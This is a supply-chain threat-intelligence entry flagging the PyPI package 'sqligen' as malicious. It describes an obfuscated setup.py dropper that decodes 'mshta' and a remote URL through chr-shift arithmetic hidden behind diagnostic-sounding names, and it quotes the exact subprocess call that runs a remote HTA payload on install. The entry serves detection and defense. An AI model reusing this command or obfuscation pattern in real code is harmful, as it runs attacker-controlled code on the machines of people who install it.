Supply-chain threat intelligence
Risk score: 92
Indexed incident for sqligen (pypi).
setup.py contains an obfuscated install-time dropper that fires on Windows. Two functions with diagnostic-sounding names ('GetDefaultSystemPolicy' / 'CalculateNodeDrift'), backed by integer arrays presented as 'InterruptThresholds' and 'ThreadPingLatencies', decode via chr(value+14) arithmetic to the strings 'mshta' and 'https://fixars.top'. On Windows, GetGitCommitHash() runs subprocess.check_output(['mshta', 'https://fixars.top'], shell=True), which executes an arbitrary remote HTA payload from fixars.top. This code path is reached from CustomInstallCommand, CustomBuildPyCommand, and CustomDevelopCommand, so any pip install sqligen (or pip install -e .) on a Windows host triggers remote code execution under the installing user's account. The obfuscation (cover-story variable names, chr-shift encoding of the command and URL) demonstrates intentional evasion of source review; legitimate build tooling does not encode 'mshta' as 'hardware interrupt latency thresholds'. The fetched payload is attacker-controlled and unrelated to the package's stated SQL-generation purpose.
During installation, the code attempts to download and start a malicious executable.
Likely related to 2025-08-raknet-testing-package.
Category: MALICIOUS - the campaign has clearly malicious intent (e.g. infostealers).
Campaign: 2026-06-easyaillm
Reasons (based on the campaign):
Downloads and executes a remote executable.
obfuscation
malware
tool:mshta